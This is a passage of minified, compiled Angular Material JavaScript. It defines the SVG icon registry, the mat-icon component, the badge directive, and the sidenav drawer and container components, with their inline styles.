r=this._svgIconConfigs.get(n);if(r)return this._getSvgFromConfig(r);if(r=this._getIconConfigFromResolvers(i,e),r)return this._svgIconConfigs.set(n,r),this._getSvgFromConfig(r);const c=this._iconSetConfigs.get(i);return c?this._getSvgFromIconSetConfigs(e,c):b1(SW(n))}ngOnDestroy(){this._resolvers=[],this._svgIconConfigs.clear(),this._iconSetConfigs.clear(),this._cachedIconsByUrl.clear()}_getSvgFromConfig(e){return e.svgText?Bi(X3(this._svgElementFromConfig(e))):this._loadSvgIconFromConfig(e).pipe(Xe(i=>X3(i)))}_getSvgFromIconSetConfigs(e,i){const n=this._extractIconWithNameFromAnySet(e,i);return n?Bi(n):$6(i.filter(c=>!c.svgText).map(c=>this._loadSvgIconSetFromConfig(c).pipe(Sh(d=>{const k=`Loading icon set URL: ${this._sanitizer.sanitize(oo.RESOURCE_URL,c.url)} failed: ${d.message}`;return this._errorHandler.handleError(new Error(k)),Bi(null)})))).pipe(Xe(()=>{const c=this._extractIconWithNameFromAnySet(e,i);if(!c)throw SW(e);return c}))}_extractIconWithNameFromAnySet(e,i){for(let n=i.length-1;n>=0;n--){const r=i[n];if(r.svgText&&r.svgText.toString().indexOf(e)>-1){const c=this._svgElementFromConfig(r),d=this._extractSvgIconFromSet(c,e,r.options);if(d)return d}}return null}_loadSvgIconFromConfig(e){return this._fetchIcon(e).pipe(qr(i=>e.svgText=i),Xe(()=>this._svgElementFromConfig(e)))}_loadSvgIconSetFromConfig(e){return e.svgText?Bi(null):this._fetchIcon(e).pipe(qr(i=>e.svgText=i))}_extractSvgIconFromSet(e,i,n){const r=e.querySelector(`[id="${i}"]`);if(!r)return null;const c=r.cloneNode(!0);if(c.removeAttribute("id"),"svg"===c.nodeName.toLowerCase())return this._setSvgAttributes(c,n);if("symbol"===c.nodeName.toLowerCase())return this._setSvgAttributes(this._toSvgElement(c),n);const d=this._svgElementFromString(tb("<svg></svg>"));return d.appendChild(c),this._setSvgAttributes(d,n)}_svgElementFromString(e){const i=this._document.createElement("DIV");i.innerHTML=e;const n=i.querySelector("svg");if(!n)throw Error("<svg> tag not found");return n}_toSvgElement(e){const i=this._svgElementFromString(tb("<svg></svg>")),n=e.attributes;for(let r=0;r<n.length;r++){const{name:c,value:d}=n[r];"id"!==c&&i.setAttribute(c,d)}for(let r=0;r<e.childNodes.length;r++)e.childNodes[r].nodeType===this._document.ELEMENT_NODE&&i.appendChild(e.childNodes[r].cloneNode(!0));return i}_setSvgAttributes(e,i){return e.setAttribute("fit",""),e.setAttribute("height","100%"),e.setAttribute("width","100%"),e.setAttribute("preserveAspectRatio","xMidYMid meet"),e.setAttribute("focusable","false"),i&&i.viewBox&&e.setAttribute("viewBox",i.viewBox),e}_fetchIcon(e){var i;const{url:n,options:r}=e,c=null!==(i=null==r?void 0:r.withCredentials)&&void 0!==i&&i;if(!this._httpClient)throw function Kpe(){return Error("Could not find HttpClient provider for use with Angular Material icons. Please include the HttpClientModule from @angular/common/http in your app imports.")}();if(null==n)throw Error(`Cannot fetch icon from URL "${n}".`);const d=this._sanitizer.sanitize(oo.RESOURCE_URL,n);if(!d)throw kW(n);const T=this._inProgressUrlFetches.get(d);if(T)return T;const k=this._httpClient.get(d,{responseType:"text",withCredentials:c}).pipe(Xe(q=>tb(q)),U4(()=>this._inProgressUrlFetches.delete(d)),Bd());return this._inProgressUrlFetches.set(d,k),k}_addSvgIconConfig(e,i,n){return this._svgIconConfigs.set(OW(e,i),n),this}_addSvgIconSetConfig(e,i){const n=this._iconSetConfigs.get(e);return n?n.push(i):this._iconSetConfigs.set(e,[i]),this}_svgElementFromConfig(e){if(!e.svgElement){const i=this._svgElementFromString(e.svgText);this._setSvgAttributes(i,e.options),e.svgElement=i}return e.svgElement}_getIconConfigFromResolvers(e,i){for(let n=0;n<this._resolvers.length;n++){const r=this._resolvers[n](i,e);if(r)return Ype(r)?new yg(r.url,null,r.options):new yg(r,null)}}}return t.\u0275fac=function(e){return new(e||t)(At(rp,8),At(cy),At(ga,8),At(yh))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function X3(t){return t.cloneNode(!0)}function OW(t,a){return t+":"+a}function Ype(t){return!(!t.url||!t.options)}const Jpe=kd(class{constructor(t){this._elementRef=t}}),Zpe=new ni("MAT_ICON_DEFAULT_OPTIONS"),e_e=new ni("mat-icon-location",{providedIn:"root",factory:function t_e(){const t=Po(ga),a=t?t.location:null;return{getPathname:()=>a?a.pathname+a.search:""}}}),NW=["clip-path","color-profile","src","cursor","fill","filter","marker","marker-start","marker-mid","marker-end","mask","stroke"],i_e=NW.map(t=>`[${t}]`).join(", "),a_e=/^url\(['"]?#(.*?)['"]?\)$/;let oa=(()=>{class t extends Jpe{constructor(e,i,n,r,c,d){super(e),this._iconRegistry=i,this._location=r,this._errorHandler=c,this._inline=!1,this._previousFontSetClass=[],this._currentIconFetch=I.EMPTY,d&&(d.color&&(this.color=this.defaultColor=d.color),d.fontSet&&(this.fontSet=d.fontSet)),n||e.nativeElement.setAttribute("aria-hidden","true")}get inline(){return this._inline}set inline(e){this._inline=wi(e)}get svgIcon(){return this._svgIcon}set svgIcon(e){e!==this._svgIcon&&(e?this._updateSvgIcon(e):this._svgIcon&&this._clearSvgElement(),this._svgIcon=e)}get fontSet(){return this._fontSet}set fontSet(e){const i=this._cleanupFontValue(e);i!==this._fontSet&&(this._fontSet=i,this._updateFontIconClasses())}get fontIcon(){return this._fontIcon}set fontIcon(e){const i=this._cleanupFontValue(e);i!==this._fontIcon&&(this._fontIcon=i,this._updateFontIconClasses())}_splitIconName(e){if(!e)return["",""];const i=e.split(":");switch(i.length){case 1:return["",i[0]];case 2:return i;default:throw Error(`Invalid icon name: "${e}"`)}}ngOnInit(){this._updateFontIconClasses()}ngAfterViewChecked(){const e=this._elementsWithExternalReferences;if(e&&e.size){const i=this._location.getPathname();i!==this._previousPath&&(this._previousPath=i,this._prependPathToReferences(i))}}ngOnDestroy(){this._currentIconFetch.unsubscribe(),this._elementsWithExternalReferences&&this._elementsWithExternalReferences.clear()}_usingFontIcon(){return!this.svgIcon}_setSvgElement(e){this._clearSvgElement();const i=this._location.getPathname();this._previousPath=i,this._cacheChildrenWithExternalReferences(e),this._prependPathToReferences(i),this._elementRef.nativeElement.appendChild(e)}_clearSvgElement(){const e=this._elementRef.nativeElement;let i=e.childNodes.length;for(this._elementsWithExternalReferences&&this._elementsWithExternalReferences.clear();i--;){const n=e.childNodes[i];(1!==n.nodeType||"svg"===n.nodeName.toLowerCase())&&n.remove()}}_updateFontIconClasses(){if(!this._usingFontIcon())return;const e=this._elementRef.nativeElement,i=(this.fontSet?this._iconRegistry.classNameForFontAlias(this.fontSet).split(/ +/):this._iconRegistry.getDefaultFontSetClass()).filter(n=>n.length>0);this._previousFontSetClass.forEach(n=>e.classList.remove(n)),i.forEach(n=>e.classList.add(n)),this._previousFontSetClass=i,this.fontIcon!==this._previousFontIconClass&&!i.includes("mat-ligature-font")&&(this._previousFontIconClass&&e.classList.remove(this._previousFontIconClass),this.fontIcon&&e.classList.add(this.fontIcon),this._previousFontIconClass=this.fontIcon)}_cleanupFontValue(e){return"string"==typeof e?e.trim().split(" ")[0]:e}_prependPathToReferences(e){const i=this._elementsWithExternalReferences;i&&i.forEach((n,r)=>{n.forEach(c=>{r.setAttribute(c.name,`url('${e}#${c.value}')`)})})}_cacheChildrenWithExternalReferences(e){const i=e.querySelectorAll(i_e),n=this._elementsWithExternalReferences=this._elementsWithExternalReferences||new Map;for(let r=0;r<i.length;r++)NW.forEach(c=>{const d=i[r],T=d.getAttribute(c),k=T?T.match(a_e):null;if(k){let q=n.get(d);q||(q=[],n.set(d,q)),q.push({name:c,value:k[1]})}})}_updateSvgIcon(e){if(this._svgNamespace=null,this._svgName=null,this._currentIconFetch.unsubscribe(),e){const[i,n]=this._splitIconName(e);i&&(this._svgNamespace=i),n&&(this._svgName=n),this._currentIconFetch=this._iconRegistry.getNamedSvgIcon(n,i).pipe(Cn(1)).subscribe(r=>this._setSvgElement(r),r=>{this._errorHandler.handleError(new Error(`Error retrieving icon ${i}:${n}! ${r.message}`))})}}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(K3),Vr("aria-hidden"),Ee(e_e),Ee(yh),Ee(Zpe,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-icon"]],hostAttrs:["role","img",1,"mat-icon","notranslate"],hostVars:8,hostBindings:function(e,i){2&e&&(Rt("data-mat-icon-type",i._usingFontIcon()?"font":"svg")("data-mat-icon-name",i._svgName||i.fontIcon)("data-mat-icon-namespace",i._svgNamespace||i.fontSet)("fontIcon",i._usingFontIcon()?i.fontIcon:null),Ct("mat-icon-inline",i.inline)("mat-icon-no-color","primary"!==i.color&&"accent"!==i.color&&"warn"!==i.color))},inputs:{color:"color",inline:"inline",svgIcon:"svgIcon",fontSet:"fontSet",fontIcon:"fontIcon"},exportAs:["matIcon"],features:[ci],ngContentSelectors:Qpe,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},styles:[".mat-icon{-webkit-user-select:none;user-select:none;background-repeat:no-repeat;display:inline-block;fill:currentColor;height:24px;width:24px;overflow:hidden}.mat-icon.mat-icon-inline{font-size:inherit;height:inherit;line-height:inherit;width:inherit}.mat-icon.mat-ligature-font[fontIcon]::before{content:attr(fontIcon)}[dir=rtl] .mat-icon-rtl-mirror{transform:scale(-1, 1)}.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-prefix .mat-icon,.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-suffix .mat-icon{display:block}.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-prefix .mat-icon-button .mat-icon,.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-suffix .mat-icon-button .mat-icon{margin:auto}"],encapsulation:2,changeDetection:0}),t})(),ib=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})(),n_e=0;const o_e=Jc(class{}),LW="mat-badge-content";let Hh=(()=>{class t extends o_e{constructor(e,i,n,r,c){super(),this._ngZone=e,this._elementRef=i,this._ariaDescriber=n,this._renderer=r,this._animationMode=c,this._color="primary",this._overlap=!0,this.position="above after",this.size="medium",this._id=n_e++,this._isInitialized=!1}get color(){return this._color}set color(e){this._setColor(e),this._color=e}get overlap(){return this._overlap}set overlap(e){this._overlap=wi(e)}get content(){return this._content}set content(e){this._updateRenderedContent(e)}get description(){return this._description}set description(e){this._updateHostAriaDescription(e)}get hidden(){return this._hidden}set hidden(e){this._hidden=wi(e)}isAbove(){return-1===this.position.indexOf("below")}isAfter(){return-1===this.position.indexOf("before")}getBadgeElement(){return this._badgeElement}ngOnInit(){this._clearExistingBadges(),this.content&&!this._badgeElement&&(this._badgeElement=this._createBadgeElement(),this._updateRenderedContent(this.content)),this._isInitialized=!0}ngOnDestroy(){this._renderer.destroyNode&&this._renderer.destroyNode(this._badgeElement),this._ariaDescriber.removeDescription(this._elementRef.nativeElement,this.description)}_createBadgeElement(){const e=this._renderer.createElement("span"),i="mat-badge-active";return e.setAttribute("id",`mat-badge-content-${this._id}`),e.setAttribute("aria-hidden","true"),e.classList.add(LW),"NoopAnimations"===this._animationMode&&e.classList.add("_mat-animation-noopable"),this._elementRef.nativeElement.appendChild(e),"function"==typeof requestAnimationFrame&&"NoopAnimations"!==this._animationMode?this._ngZone.runOutsideAngular(()=>{requestAnimationFrame(()=>{e.classList.add(i)})}):e.classList.add(i),e}_updateRenderedContent(e){const i=`${null!=e?e:""}`.trim();this._isInitialized&&i&&!this._badgeElement&&(this._badgeElement=this._createBadgeElement()),this._badgeElement&&(this._badgeElement.textContent=i),this._content=i}_updateHostAriaDescription(e){this._ariaDescriber.removeDescription(this._elementRef.nativeElement,this.description),e&&this._ariaDescriber.describe(this._elementRef.nativeElement,e),this._description=e}_setColor(e){const i=this._elementRef.nativeElement.classList;i.remove(`mat-badge-${this._color}`),e&&i.add(`mat-badge-${e}`)}_clearExistingBadges(){const e=this._elementRef.nativeElement.querySelectorAll(`:scope > .${LW}`);for(const i of Array.from(e))i!==this._badgeElement&&i.remove()}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi),Ee(mi),Ee(Pw),Ee(wr),Ee(ir,8))},t.\u0275dir=Ot({type:t,selectors:[["","matBadge",""]],hostAttrs:[1,"mat-badge"],hostVars:20,hostBindings:function(e,i){2&e&&Ct("mat-badge-overlap",i.overlap)("mat-badge-above",i.isAbove())("mat-badge-below",!i.isAbove())("mat-badge-before",!i.isAfter())("mat-badge-after",i.isAfter())("mat-badge-small","small"===i.size)("mat-badge-medium","medium"===i.size)("mat-badge-large","large"===i.size)("mat-badge-hidden",i.hidden||!i.content)("mat-badge-disabled",i.disabled)},inputs:{disabled:["matBadgeDisabled","disabled"],color:["matBadgeColor","color"],overlap:["matBadgeOverlap","overlap"],position:["matBadgePosition","position"],content:["matBadge","content"],description:["matBadgeDescription","description"],size:["matBadgeSize","size"],hidden:["matBadgeHidden","hidden"]},features:[ci]}),t})(),zW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Xy,la,la]}),t})();const WW=["*"],r_e=["content"];function s_e(t,a){if(1&t){const e=Ye();m(0,"div",2),he("click",function(){return be(e),Me(B()._onBackdropClicked())}),u()}2&t&&Ct("mat-drawer-shown",B()._isShowingBackdrop())}function c_e(t,a){1&t&&(m(0,"mat-drawer-content"),va(1,2),u())}const l_e=[[["mat-drawer"]],[["mat-drawer-content"]],"*"],d_e=["mat-drawer","mat-drawer-content","*"],m_e={transformDrawer:ar("transform",[sn("open, open-instant",zi({transform:"none",visibility:"visible"})),sn("void",zi({"box-shadow":"none",visibility:"hidden"})),gn("void => open-instant",En("0ms")),gn("void <=> open, open-instant => void",En("400ms cubic-bezier(0.25, 0.8, 0.25, 1)"))])},u_e=new ni("MAT_DRAWER_DEFAULT_AUTOSIZE",{providedIn:"root",factory:function h_e(){return!1}}),FW=new ni("MAT_DRAWER_CONTAINER");let Od=(()=>{class t extends uw{constructor(e,i,n,r,c){super(n,r,c),this._changeDetectorRef=e,this._container=i}ngAfterContentInit(){this._container._contentMarginChanges.subscribe(()=>{this._changeDetectorRef.markForCheck()})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(ja(()=>gu)),Ee(mi),Ee(By),Ee(qi))},t.\u0275cmp=Wt({type:t,selectors:[["mat-drawer-content"]],hostAttrs:[1,"mat-drawer-content"],hostVars:4,hostBindings:function(e,i){2&e&&ri("margin-left",i._container._contentMargins.left,"px")("margin-right",i._container._contentMargins.right,"px")},features:[ki([{provide:uw,useExisting:t}]),ci],ngContentSelectors:WW,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},encapsulation:2,changeDetection:0}),t})(),_u=(()=>{class t{constructor(e,i,n,r,c,d,T,k){this._elementRef=e,this._focusTrapFactory=i,this._focusMonitor=n,this._platform=r,this._ngZone=c,this._interactivityChecker=d,this._doc=T,this._container=k,this._elementFocusedBeforeDrawerWasOpened=null,this._enableAnimations=!1,this._position="start",this._mode="over",this._disableClose=!1,this._opened=!1,this._animationStarted=new J,this._animationEnd=new J,this._animationState="void",this.openedChange=new Tt(!0),this._openedStream=this.openedChange.pipe(Dn(q=>q),Xe(()=>{})),this.openedStart=this._animationStarted.pipe(Dn(q=>q.fromState!==q.toState&&0===q.toState.indexOf("open")),H4(void 0)),this._closedStream=this.openedChange.pipe(Dn(q=>!q),Xe(()=>{})),this.closedStart=this._animationStarted.pipe(Dn(q=>q.fromState!==q.toState&&"void"===q.toState),H4(void 0)),this._destroyed=new J,this.onPositionChanged=new Tt,this._modeChanged=new J,this.openedChange.subscribe(q=>{q?(this._doc&&(this._elementFocusedBeforeDrawerWasOpened=this._doc.activeElement),this._takeFocus()):this._isFocusWithinDrawer()&&this._restoreFocus(this._openedVia||"program")}),this._ngZone.runOutsideAngular(()=>{Tc(this._elementRef.nativeElement,"keydown").pipe(Dn(q=>27===q.keyCode&&!this.disableClose&&!Zr(q)),ea(this._destroyed)).subscribe(q=>this._ngZone.run(()=>{this.close(),q.stopPropagation(),q.preventDefault()}))}),this._animationEnd.pipe(Bh((q,Y)=>q.fromState===Y.fromState&&q.toState===Y.toState)).subscribe(q=>{const{fromState:Y,toState:te}=q;(0===te.indexOf("open")&&"void"===Y||"void"===te&&0===Y.indexOf("open"))&&this.openedChange.emit(this._opened)})}get position(){return this._position}set position(e){(e="end"===e?"end":"start")!==this._position&&(this._isAttached&&this._updatePositionInParent(e),this._position=e,this.onPositionChanged.emit())}get mode(){return this._mode}set mode(e){this._mode=e,this._updateFocusTrapState(),this._modeChanged.next()}get disableClose(){return this._disableClose}set disableClose(e){this._disableClose=wi(e)}get autoFocus(){const e=this._autoFocus;return null==e?"side"===this.mode?"dialog":"first-tabbable":e}set autoFocus(e){("true"===e||"false"===e||null==e)&&(e=wi(e)),this._autoFocus=e}get opened(){return this._opened}set opened(e){this.toggle(wi(e))}_forceFocus(e,i){this._interactivityChecker.isFocusable(e)||(e.tabIndex=-1,this._ngZone.runOutsideAngular(()=>{const n=()=>{e.removeEventListener("blur",n),e.removeEventListener("mousedown",n),e.removeAttribute("tabindex")};e.addEventListener("blur",n),e.addEventListener("mousedown",n)})),e.focus(i)}_focusByCssSelector(e,i){let n=this._elementRef.nativeElement.querySelector(e);n&&this._forceFocus(n,i)}_takeFocus(){if(!this._focusTrap)return;const e=this._elementRef.nativeElement;switch(this.autoFocus){case!1:case"dialog":return;case!0:case"first-tabbable":this._focusTrap.focusInitialElementWhenReady().then(i=>{!i&&"function"==typeof this._elementRef.nativeElement.focus&&e.focus()});break;case"first-heading":this._focusByCssSelector('h1, h2, h3, h4, h5, h6, [role="heading"]');break;default:this._focusByCssSelector(this.autoFocus)}}_restoreFocus(e){"dialog"!==this.autoFocus&&(this._elementFocusedBeforeDrawerWasOpened?this._focusMonitor.focusVia(this._elementFocusedBeforeDrawerWasOpened,e):this._elementRef.nativeElement.blur(),this._elementFocusedBeforeDrawerWasOpened=null)}_isFocusWithinDrawer(){const e=this._doc.activeElement;return!!e&&this._elementRef.nativeElement.contains(e)}ngAfterViewInit(){this._isAttached=!0,this._focusTrap=this._focusTrapFactory.create(this._elementRef.nativeElement),this._updateFocusTrapState(),"end"===this._position&&this._updatePositionInParent("end")}ngAfterContentChecked(){this._platform.isBrowser&&(this._enableAnimations=!0)}ngOnDestroy(){var e;this._focusTrap&&this._focusTrap.destroy(),null===(e=this._anchor)||void 0===e||e.remove(),this._anchor=null,this._animationStarted.complete(),this._animationEnd.complete(),this._modeChanged.complete(),this._destroyed.next(),this._destroyed.complete()}open(e){return this.toggle(!0,e)}close(){return this.toggle(!1)}_closeViaBackdropClick(){return this._setOpen(!1,!0,"mouse")}toggle(e=!this.opened,i){e&&i&&(this._openedVia=i);const n=this._setOpen(e,!e&&this._isFocusWithinDrawer(),this._openedVia||"program");return e||(this._openedVia=null),n}_setOpen(e,i,n){return this._opened=e,e?this._animationState=this._enableAnimations?"open":"open-instant":(this._animationState="void",i&&this._restoreFocus(n)),this._updateFocusTrapState(),new Promise(r=>{this.openedChange.pipe(Cn(1)).subscribe(c=>r(c?"open":"close"))})}_getWidth(){return this._elementRef.nativeElement&&this._elementRef.nativeElement.offsetWidth||0}_updateFocusTrapState(){this._focusTrap&&(this._focusTrap.enabled=this.opened&&"side"!==this.mode)}_updatePositionInParent(e){const i=this._elementRef.nativeElement,n=i.parentNode;"end"===e?(this._anchor||(this._anchor=this._doc.createComment("mat-drawer-anchor"),n.insertBefore(this._anchor,i)),n.appendChild(i)):this._anchor&&this._anchor.parentNode.insertBefore(i,this._anchor)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(z3),Ee(js),Ee(sr),Ee(qi),Ee(Ky),Ee(ga,8),Ee(FW,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-drawer"]],viewQuery:function(e,i){if(1&e&&Mi(r_e,5),2&e){let n;Vt(n=Bt())&&(i._content=n.first)}},hostAttrs:["tabIndex","-1",1,"mat-drawer"],hostVars:12,hostBindings:function(e,i){1&e&&GC("@transform.start",function(r){return i._animationStarted.next(r)})("@transform.done",function(r){return i._animationEnd.next(r)}),2&e&&(Rt("align",null),s1("@transform",i._animationState),Ct("mat-drawer-end","end"===i.position)("mat-drawer-over","over"===i.mode)("mat-drawer-push","push"===i.mode)("mat-drawer-side","side"===i.mode)("mat-drawer-opened",i.opened))},inputs:{position:"position",mode:"mode",disableClose:"disableClose",autoFocus:"autoFocus",opened:"opened"},outputs:{openedChange:"openedChange",_openedStream:"opened",openedStart:"openedStart",_closedStream:"closed",closedStart:"closedStart",onPositionChanged:"positionChanged"},exportAs:["matDrawer"],ngContentSelectors:WW,decls:3,vars:0,consts:[["cdkScrollable","",1,"mat-drawer-inner-container"],["content",""]],template:function(e,i){1&e&&(Jn(),m(0,"div",0,1),va(2),u())},dependencies:[uw],encapsulation:2,data:{animation:[m_e.transformDrawer]},changeDetection:0}),t})(),gu=(()=>{class t{constructor(e,i,n,r,c,d=!1,T){this._dir=e,this._element=i,this._ngZone=n,this._changeDetectorRef=r,this._animationMode=T,this._drawers=new gd,this.backdropClick=new Tt,this._destroyed=new J,this._doCheckSubject=new J,this._contentMargins={left:null,right:null},this._contentMarginChanges=new J,e&&e.change.pipe(ea(this._destroyed)).subscribe(()=>{this._validateDrawers(),this.updateContentMargins()}),c.change().pipe(ea(this._destroyed)).subscribe(()=>this.updateContentMargins()),this._autosize=d}get start(){return this._start}get end(){return this._end}get autosize(){return this._autosize}set autosize(e){this._autosize=wi(e)}get hasBackdrop(){return null==this._backdropOverride?!this._start||"side"!==this._start.mode||!this._end||"side"!==this._end.mode:this._backdropOverride}set hasBackdrop(e){this._backdropOverride=null==e?null:wi(e)}get scrollable(){return this._userContent||this._content}ngAfterContentInit(){this._allDrawers.changes.pipe(Ro(this._allDrawers),ea(this._destroyed)).subscribe(e=>{this._drawers.reset(e.filter(i=>!i._container||i._container===this)),this._drawers.notifyOnChanges()}),this._drawers.changes.pipe(Ro(null)).subscribe(()=>{this._validateDrawers(),this._drawers.forEach(e=>{this._watchDrawerToggle(e),this._watchDrawerPosition(e),this._watchDrawerMode(e)}),(!this._drawers.length||this._isDrawerOpen(this._start)||this._isDrawerOpen(this._end))&&this.updateContentMargins(),this._changeDetectorRef.markForCheck()}),this._ngZone.runOutsideAngular(()=>{this._doCheckSubject.pipe(dp(10),ea(this._destroyed)).subscribe(()=>this.updateContentMargins())})}ngOnDestroy(){this._contentMarginChanges.complete(),this._doCheckSubject.complete(),this._drawers.destroy(),this._destroyed.next(),this._destroyed.complete()}open(){this._drawers.forEach(e=>e.open())}close(){this._drawers.forEach(e=>e.close())}updateContentMargins(){let e=0,i=0;if(this._left&&this._left.opened)if("side"==this._left.mode)e+=this._left._getWidth();else if("push"==this._left.mode){const n=this._left._getWidth();e+=n,i-=n}if(this._right&&this._right.opened)if("side"==this._right.mode)i+=this._right._getWidth();else if("push"==this._right.mode){const n=this._right._getWidth();i+=n,e-=n}e=e||null,i=i||null,(e!==this._contentMargins.left||i!==this._contentMargins.right)&&(this._contentMargins={left:e,right:i},this._ngZone.run(()=>this._contentMarginChanges.next(this._contentMargins)))}ngDoCheck(){this._autosize&&this._isPushed()&&this._ngZone.runOutsideAngular(()=>this._doCheckSubject.next())}_watchDrawerToggle(e){e._animationStarted.pipe(Dn(i=>i.fromState!==i.toState),ea(this._drawers.changes)).subscribe(i=>{"open-instant"!==i.toState&&"NoopAnimations"!==this._animationMode&&this._element.nativeElement.classList.add("mat-drawer-transition"),this.updateContentMargins(),this._changeDetectorRef.markForCheck()}),"side"!==e.mode&&e.openedChange.pipe(ea(this._drawers.changes)).subscribe(()=>this._setContainerClass(e.opened))}_watchDrawerPosition(e){!e||e.onPositionChanged.pipe(ea(this._drawers.changes)).subscribe(()=>{this._ngZone.onMicrotaskEmpty.pipe(Cn(1)).subscribe(()=>{this._validateDrawers()})})}_watchDrawerMode(e){e&&e._modeChanged.pipe(ea(ra(this._drawers.changes,this._destroyed))).subscribe(()=>{this.updateContentMargins(),this._changeDetectorRef.markForCheck()})}_setContainerClass(e){const i=this._element.nativeElement.classList,n="mat-drawer-container-has-open";e?i.add(n):i.remove(n)}_validateDrawers(){this._start=this._end=null,this._drawers.forEach(e=>{"end"==e.position?this._end=e:this._start=e}),this._right=this._left=null,this._dir&&"rtl"===this._dir.value?(this._left=this._end,this._right=this._start):(this._left=this._start,this._right=this._end)}_isPushed(){return this._isDrawerOpen(this._start)&&"over"!=this._start.mode||this._isDrawerOpen(this._end)&&"over"!=this._end.mode}_onBackdropClicked(){this.backdropClick.emit(),this._closeModalDrawersViaBackdrop()}_closeModalDrawersViaBackdrop(){[this._start,this._end].filter(e=>e&&!e.disableClose&&this._canHaveBackdrop(e)).forEach(e=>e._closeViaBackdropClick())}_isShowingBackdrop(){return this._isDrawerOpen(this._start)&&this._canHaveBackdrop(this._start)||this._isDrawerOpen(this._end)&&this._canHaveBackdrop(this._end)}_canHaveBackdrop(e){return"side"!==e.mode||!!this._backdropOverride}_isDrawerOpen(e){return null!=e&&e.opened}}return t.\u0275fac=function(e){return new(e||t)(Ee(Cr,8),Ee(mi),Ee(qi),Ee(Ma),Ee(bm),Ee(u_e),Ee(ir,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-drawer-container"]],contentQueries:function(e,i,n){if(1&e&&(ha(n,Od,5),ha(n,_u,5)),2&e){let r;Vt(r=Bt())&&(i._content=r.first),Vt(r=Bt())&&(i._allDrawers=r)}},viewQuery:function(e,i){if(1&e&&Mi(Od,5),2&e){let n;Vt(n=Bt())&&(i._userContent=n.first)}},hostAttrs:[1,"mat-drawer-container"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-drawer-container-explicit-backdrop",i._backdropOverride)},inputs:{autosize:"autosize",hasBackdrop:"hasBackdrop"},outputs:{backdropClick:"backdropClick"},exportAs:["matDrawerContainer"],features:[ki([{provide:FW,useExisting:t}])],ngContentSelectors:d_e,decls:4,vars:2,consts:[["class","mat-drawer-backdrop",3,"mat-drawer-shown","click",4,"ngIf"],[4,"ngIf"],[1,"mat-drawer-backdrop",3,"click"]],template:function(e,i){1&e&&(Jn(l_e),ne(0,s_e,1,2,"div",0),va(1),va(2,1),ne(3,c_e,2,0,"mat-drawer-content",1)),2&e&&(V("ngIf",i.hasBackdrop),C(3),V("ngIf",!i._content))},dependencies:[Ri,Od],styles:['.mat-drawer-container{position:relative;z-index:1;box-sizing:border-box;-webkit-overflow-scrolling:touch;display:block;overflow:hidden}.mat-drawer-container[fullscreen]{top:0;left:0;right:0;bottom:0;position:absolute}.mat-drawer-container[fullscreen].mat-drawer-container-has-open{overflow:hidden}.mat-drawer-container.mat-drawer-container-explicit-backdrop .mat-drawer-side{z-index:3}.mat-drawer-container.ng-animate-disabled .mat-drawer-backdrop,.mat-drawer-container.ng-animate-disabled .mat-drawer-content,.ng-animate-disabled .mat-drawer-container .mat-drawer-backdrop,.ng-animate-disabled .mat-drawer-container .mat-drawer-content{transition:none}.mat-drawer-backdrop{top:0;left:0;right:0;bottom:0;position:absolute;display:block;z-index:3;visibility:hidden}.mat-drawer-backdrop.mat-drawer-shown{visibility:visible}.mat-drawer-transition .mat-drawer-backdrop{transition-duration:400ms;transition-timing-function:cubic-bezier(0.25, 0.8, 0.25, 1);transition-property:background-color,visibility}.cdk-high-contrast-active .mat-drawer-backdrop{opacity:.5}.mat-drawer-content{position:relative;z-index:1;display:block;height:100%;overflow:auto}.mat-drawer-transition .mat-drawer-content{transition-duration:400ms;transition-timing-function:cubic-bezier(0.25, 0.8, 0.25, 1);transition-property:transform,margin-left,margin-right}.mat-drawer{position:relative;z-index:4;display:block;position:absolute;top:0;bottom:0;z-index:3;outline:0;box-sizing:border-box;overflow-y:auto;transform:translate3d(-100%, 0, 0)}.cdk-high-contrast-active .mat-drawer,.cdk-high-contrast-active [dir=rtl] .mat-drawer.mat-drawer-end{border-right:solid 1px currentColor}.cdk-high-contrast-active [dir=rtl] .mat-drawer,.cdk-high-contrast-active .mat-drawer.mat-drawer-end{border-left:solid 1px currentColor;border-right:none}.mat-drawer.mat-drawer-side{z-index:2}.mat-drawer.mat-drawer-end{right:0;transform:translate3d(100%, 0, 0)}[dir=rtl] .mat-drawer{transform:translate3d(100%, 0, 0)}[dir=rtl] .mat-drawer.mat-drawer-end{left:0;right:auto;transform:translate3d(-100%, 0, 0)}.mat-drawer[style*="visibility: hidden"]{display:none}.mat-drawer-inner-container{width:100%;height:100%;overflow:auto;-webkit-overflow-scrolling:touch}.mat-sidenav-fixed{position:fixed}'],encapsulation:2,changeDetection:0}),t})(),VW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,uu,uu,la]}),t})();const f_e=mp(Jc(hu));let Y3=(()=>{class t extends f_e{constructor(e,i,n){super(e,i),this.tabIndex=Number(n)||0}ngOnInit(){super.ngOnInit()}ngOnDestroy(){super.ngOnDestroy()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(zh),Vr("tabindex"))},t.\u0275dir=Ot({type:t,selectors:[["mat-tree-node"]],hostAttrs:[1,"mat-tree-node"],inputs:{role:"role",disabled:"disabled",tabIndex:"tabIndex"},exportAs:["matTreeNode"],features:[ki([{provide:hu,useExisting:t}]),ci]}),t})(),Kw=(()=>{class t extends k3{}return t.\u0275fac=function(){let a;return 